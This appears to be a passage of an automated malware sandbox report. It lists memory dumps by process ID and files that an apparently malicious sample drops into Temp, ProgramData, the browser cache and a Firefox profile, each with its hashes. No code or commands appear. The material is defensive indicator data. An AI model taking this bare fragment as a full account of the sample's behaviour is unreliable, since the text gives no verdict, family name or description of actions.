memory/4904-316-0x00000000004E0000-0x0000000000ECD000-memory.dmp

memory/796-317-0x0000000000FC0000-0x0000000001482000-memory.dmp

memory/4168-318-0x0000000000640000-0x000000000066F000-memory.dmp

memory/4168-324-0x0000000000640000-0x000000000066F000-memory.dmp

memory/4168-319-0x0000000000640000-0x000000000066F000-memory.dmp

memory/4904-325-0x00000000004E0000-0x0000000000ECD000-memory.dmp

memory/4168-329-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/684-347-0x00000000005D0000-0x0000000001203000-memory.dmp

memory/796-350-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9A9QSX6A\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/684-354-0x00000000005D0000-0x0000000001203000-memory.dmp

memory/684-353-0x00000000005D0000-0x0000000001203000-memory.dmp

memory/2392-357-0x0000000000640000-0x000000000066F000-memory.dmp

memory/2392-362-0x0000000000640000-0x000000000066F000-memory.dmp

memory/684-361-0x00000000005D0000-0x0000000001203000-memory.dmp

memory/796-372-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/5008-392-0x0000000000A90000-0x0000000000F25000-memory.dmp

memory/796-397-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\ProgramData\E8A39BDD3496DE17.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\ProgramData\0D1449A35AAF439E.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

memory/5008-438-0x0000000000A90000-0x0000000000F25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

memory/4288-454-0x0000000001000000-0x000000000130A000-memory.dmp

memory/796-456-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/1120-473-0x0000000000AE0000-0x0000000001168000-memory.dmp

memory/1120-474-0x0000000000AE0000-0x0000000001168000-memory.dmp

memory/4288-477-0x0000000001000000-0x000000000130A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/4288-495-0x0000000001000000-0x000000000130A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8GU4RKZM\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 6e1ebdfd68ea55be0e28e5a43e1faacb
SHA1 11b4c4e7fe5af850495c4c943e819fd1463ed147
SHA256 cdbbcefbab30a14486821d6f87dd09bf70f66186c1520fd5e12e8509e5ddbc97
SHA512 340eaa322321144334dbadb31f6a137b171dd2fab5c4a12d6f85988a02881f18a552dfa182819cf97002f8ded16f5f600242d1fdf5f27b41d087f2b7fe3a3afe

memory/1536-506-0x0000000000090000-0x000000000054C000-memory.dmp

memory/4288-507-0x0000000001000000-0x000000000130A000-memory.dmp

memory/1536-510-0x0000000000090000-0x000000000054C000-memory.dmp

memory/796-511-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\802b0518-2bcc-4fb1-980b-5fb39d81108a

MD5 d37aa6b7f5d46222b9c84042dd1ca95c
SHA1 6c2c887e4a82cd3fa29a7884d03e13209392ad94
SHA256 031bc858b80ed885d8110dcc12435c9e90b2bd94c0c0e7dbabe391d543208a84
SHA512 0d65ed3c97f066457c922796af9e82061f7f1bd2aff2af9e43c0b58eaf104861a9238ade763b0b6e7537b0eaf5b779e1d678d99938ce9f5f63c50a64b1ee6773

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\770d1bf9-923c-4b15-a2ab-4a86aae70360

MD5 a299b6cd256303c7ded76a09bee69c3a
SHA1 58572f68ab3b157d8da97435912017848cadc140
SHA256 416565d1cb24ddfaa58f7dbb725ac1c1624997b0b71d9fab6854e9eaaf3cd0a9
SHA512 80c3a0c5617a0fac8fd67903e4fd2f301d8691e40d024cd775852abdeb6ed40339d7effa357b20232cffbf0e3bf2944b331c2aef4717b10e9acc630d7b9f44f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp

MD5 0a754ef89c54c049aff9d5b8864f453c
SHA1 91b53e2f421ee7d79f5c73854ac89f779961080a
SHA256 33297eb90011f19eb7dcd1a5acfead5ce3dc1e5ec0948db9d9128f5950b41d93
SHA512 fd8840fd06827d31d4629933ee681bdbad6114ceb168fae7b250c9d3874684762a10e28a3368b0dc09f589cf78300cd754d98f2a1b57eb395bf8167d39552720

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp

MD5 09e18c2a364ace134e490309ea0b2889
SHA1 8b759dc65ef958b1053ebb201cba98007bc4c9a2
SHA256 3c147a58045d230e556e96870a8259ff177128e4ab805ada0d410b6432e283ea
SHA512 b9999a2a1dd85e16d5eddadce4d2e1b57a7611b0c5ab8d8fe5020f102e36ba1b62851e2f702f999be40cff63e469ea30c928e9b2fa88a81a27e316c4fbf24ace

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\8wi25oev.default-release\activity-stream.discovery_stream.json

MD5 b123bf10021f8147dbde2433cba241b1
SHA1 c62d1ebd67bb9c5439e87d485b9953b8a47d7db3
SHA256 bcd923205ef8acab76e7fc16206f6510ff968aaff72f84594f6a2c939f90b4c2
SHA512 cee14bdc1e397a0c4129449d9ae420dce398f532a53fae5010280c23e05e9d5254823dd7daf2782158bf7a701a94de7ca31646bd834f06f81f2329e29d2c48a8

C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/5848-777-0x0000000000E10000-0x000000000125E000-memory.dmp

memory/5848-783-0x0000000000E10000-0x000000000125E000-memory.dmp

memory/5848-786-0x0000000000E10000-0x000000000125E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\prefs-1.js

MD5 4a995a2145f009974a1be8c33dcb2637
SHA1 bcab03d1c1169edb1d53cb675cef6bd05ceef355
SHA256 632bdb8783d3c144b3754a884acd04f96ef6cd182000c3b7c173378deaec0923
SHA512 c3ae7d4e38ec1e41cfb297c4a1ff25d38b6ec0fd84e3800c5aa0a98ccc3acb20a70014d40b5d5bc974de30edda8a8fb685aa53283b70aa50315b5c86cd3a83b1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\AlternateServices.bin

MD5 51b15a40eab756cf1bf6ea7702e619b9
SHA1 58e35962166a63953337a3da1cbc92797c2e28c4
SHA256 d1d4089d4c13bbdd7b0229ea3a6338ccebcb8e72946e29b95f9e92233d5773a2
SHA512 cf7e5a12b269a00bdcf2baae091defbed2a9a5ecb3fb6515d48462cd55f3bc907fa493305699caafbbd1321687166ae0b007b289ee2e370610ec2f9149c469f4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2asf3YX.exe.log

MD5 34ec6630c13fce07b99f51f698e0a0d8
SHA1 2898616d80ff646c0dbdf297e31f65ee45265868
SHA256 f6bab8ba5d4dbae063dc40ccbf03df5dfa3863b5ccf40836db6b2d1ca4bc3794
SHA512 eb063acec578ccb9b56a25c0c6834c79bf9ed4ca2fd7d4b147107983f9ade1cd3a486a12c429d7d7bc5042b986132e4aa915f3efaf1249e89460b6bcbf2f7255

memory/3780-860-0x0000000000FC0000-0x0000000001482000-memory.dmp

memory/796-885-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/5848-943-0x0000000000E10000-0x000000000125E000-memory.dmp

memory/5848-953-0x0000000000E10000-0x000000000125E000-memory.dmp